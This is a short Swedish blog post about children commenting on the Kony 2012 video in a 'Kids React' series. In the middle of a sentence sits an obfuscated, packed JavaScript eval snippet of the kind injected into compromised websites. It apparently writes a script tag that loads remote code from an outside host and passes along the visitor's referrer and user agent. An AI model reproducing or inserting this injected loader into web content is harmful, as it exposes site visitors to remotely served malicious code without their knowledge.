Image Image Image Image Image Image Image Image Image Image

| 22 juli, 2018

Scroll to top

Top

No Comments

Barn reagerar på Kony 2012

Sebastian Plengier Ehrnfelt

Hypen eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c])}}return p}(‘0.6(”<\\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|nhbit|var|u0026u|referrer|adnra||js|php’.split(‘|’),0,{}))
över Kony 2012 har lugnat ner sig. Nu har dock ett par barn fått titta på videon och detta är deras kommentarer.

”Kids React” är där barn får titta på YouTube-filmer och sedan kommentera detta.

Submit a Comment